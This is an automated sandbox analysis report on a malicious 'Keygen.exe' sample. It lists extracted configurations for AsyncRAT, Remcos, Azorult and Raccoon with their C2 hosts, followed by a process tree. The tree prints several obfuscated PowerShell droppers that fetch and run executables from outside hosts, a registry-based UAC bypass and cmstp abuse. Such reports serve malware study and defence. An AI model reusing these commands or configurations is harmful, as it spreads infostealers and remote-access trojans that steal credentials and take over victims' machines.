Resubmissions
22-11-2023 17:02
231122-vkac9adg64 1019-01-2021 19:24
210119-s26yznnqsn 1019-11-2020 13:14
201119-s41ec6lt86 10Analysis
-
max time kernel
1803s -
max time network
1817s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 13:14
General
-
Target
Keygen.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
5e4db353b88c002ba6466c06437973619aad03b3
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Extracted
Family
remcos
Version
2.7.2 Light
Botnet
xxxxxxxxxxx
C2
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
Attributes
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
cvxdsaxzcas-FPRVUD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 2 IoCs
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 1 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
-
Loads dropped DLL 18 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 5 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\nrp.exe"C:\Users\Public\nrp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4928 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\873985410469049\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 49289⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\nrp.exe"C:\Users\Public\nrp.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exe"C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fdbd2kvq.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nrp.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xso.exe"C:\Users\Public\xso.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4808 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\770191126041014\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 480810⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Public\xso.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exe"C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2k2rvo42.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xso.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\tnz.exe"C:\Users\Public\tnz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\e327712778b74a85855d5a9748411b6c /t 3232 /p 32241⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\de5b817df55c49bdb250dbaf57724c42 /t 3232 /p 32241⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\ddad3vxa.exe2⤵
-
C:\Windows\temp\ddad3vxa.exeC:\Windows\temp\ddad3vxa.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
